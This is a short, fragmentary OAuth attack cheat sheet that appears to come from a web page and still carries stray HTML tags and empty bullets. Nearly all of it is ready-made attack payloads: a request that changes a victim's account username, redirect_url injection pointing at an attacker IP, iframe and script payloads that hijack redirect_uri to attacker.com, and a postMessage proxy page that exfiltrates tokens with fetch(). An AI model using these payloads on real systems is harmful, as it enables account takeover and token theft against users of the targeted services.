OAuth Attack
Change User Info
POST /authenticate HTTP/1.1
...
{
"email":"victim@example.com",
"username":"attacker",
"token":"b7Gl7Xoy..."
}
Steal Tokens
- Open Web Server in Your Local Machine
-
Inject Your Local URL to the Redirect URL
Access to the URL below.
https://vulnerable.com/oauth?redirect_url=http://<attacker-ip>:8000/login&response_type=token&scope=all
</div>
CSRF
-
Steal Code
</div>
-
Hijack redirect_url
<iframe src="https://vulnerable.com/auth?client_id=ysdj...&redirect_uri=https://attacker.com&response_type=code&scope=openid profile email"> </iframe>
</div>
-
Open Redirect
<script> if (!document.location.hash) { window.location = 'https://vulnerable.com/auth?client_id=7Fdx8a...&redirect_uri=https://vulnerable.com/oauth-callback/../post/next?path=https://attacker.com/exploit/&response_type=token&nonce=398...&scope=openid profile email' } else { window.location = '/?'+document.location.hash.substr(1) } </script>
</div>
-
Proxy Page (postMessage)
<iframe src="https://vulnerable.com/auth?client_id=iknf...&redirect_uri=https://vulnerable.com/oauth-callback/../post/comment/comment-form&response_type=token&nonce=-118...&scope=openid profile email"></iframe> <script> window.addEventListener('message', e => { fetch("/" + encodeURIComponent(e.data.data)); }, false); </script>
</div>
-
-
-
-